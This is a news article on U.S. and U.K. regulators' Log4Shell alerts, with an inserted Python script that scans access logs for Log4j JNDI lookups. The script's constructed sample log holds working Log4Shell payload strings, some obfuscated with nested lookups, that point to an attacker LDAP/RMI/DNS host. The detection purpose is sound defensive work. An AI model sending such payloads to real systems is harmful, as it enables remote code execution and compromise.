Regulators in the U.S. and U.K. are warning the financial industry about a cybersecurity vulnerability that has been uncovered in open-source software widely used in enterprise applications and cloud services.
Both the U.S. Financial Industry Regulatory Authority Inc. (FINRA) and the U.K.’s Financial Conduct Authority (FCA) issued alerts about the possible exploitation of a weakness in the Apache Log4j software.
“The ‘Log4Shell’ vulnerability presents risk for member firms because they may be using this software in internal applications, or the software may be embedded in third-party software packages,” FINRA warned.
The self-regulatory organization said hackers could exploit the vulnerability to “compromise systems to potentially steal information or engage in fraudulent activities.”
“For example, a remote attacker can exploit this vulnerability to take control of an affected system,” it warned.
Given the risk, FINRA recommended that firms work with their third-party vendors, including any IT service providers, to monitor for attempts to exploit the vulnerability and to review historical logs for possible breaches.
If attacks are identified, firms should consider activating incident response plans and treating these incidents as “high-risk cybersecurity” incidents, it said.
It also advised firms to examine their firewalls and other cybersecurity measures to address these new risks.
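The historical log review FINRA recommends can be started with a simple scanner. The following Python script is an added example, not part of this article or of any regulator's guidance: it reads web-server access log lines and flags the Log4j lookup string (`${jndi:...}`) that a Log4Shell attempt leaves behind in logged fields such as the request path or User-Agent. It goes slightly beyond a plain string match by first collapsing the common nested-lookup wrappers (case-change and default-value lookups) that are used to disguise the string. All log lines, IP addresses and timestamps are constructed for the example; the normalization is a heuristic covering common forms, not an exhaustive Log4j lookup resolver.

```python
"""Scan access-log lines for Log4Shell (Log4j JNDI lookup) attempts.

Added example with constructed sample data. A Log4Shell attempt appears in
logs as a Log4j lookup string, ${jndi:...}, inside any logged field. Such
strings are often wrapped in nested lookups (e.g. ${lower:j}) to defeat
naive matching, so the scanner resolves those wrappers before matching.
"""
import re

# ${lower:j} / ${upper:J} resolve to the single wrapped character.
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}])\}", re.IGNORECASE)
# ${anything:-value} resolves to its default "value" when the lookup fails,
# so ${::-j} or ${env:NOPE:-j} both become "j".
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The indicator we actually want after normalization.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Repeatedly resolve innermost case-change and default-value lookups
    until the text stops changing, so wrapped payloads read as plain text."""
    previous = None
    while previous != text:
        previous = text
        text = CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_log4shell_attempts(lines):
    """Return (line_number, normalized_line) for every line that contains a
    JNDI lookup after normalization. Line numbers are 1-based."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        if JNDI_LOOKUP.search(normalized):
            hits.append((number, normalized))
    return hits


# Constructed sample access log (Apache combined format, documentation IPs).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 1044 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:14:03:01 +0000] "GET /api?q=${${lower:j}ndi:rmi://203.0.113.10/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.9 - - [10/Dec/2021:14:03:40 +0000] "GET /health HTTP/1.1" 200 2 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.10/y}"',
    '203.0.113.6 - - [10/Dec/2021:14:04:00 +0000] "GET /docs HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux)"',
]

if __name__ == "__main__":
    # Lines 2, 3 and 4 of the sample are flagged; lines 1 and 5 are benign.
    for number, line in find_log4shell_attempts(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

Pointing the scanner at real access, proxy and application logs from the vulnerable window gives a first list of requests that reached the system; each hit then needs to be checked for whether the logging code actually processed the field, which is the point at which FINRA's "high-risk cybersecurity" incident handling would apply.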
The advisory reminded firms of their regulatory obligations, both under FINRA rules and the U.S. Securities and Exchange Commission’s regulations, to have adequate cybersecurity measures in place.
In its own advisory, the FCA called on firms to review new guidance from the U.K.’s National Cyber Security Centre to address the issue.
The Canadian Centre for Cyber Security has also issued an alert about the vulnerability.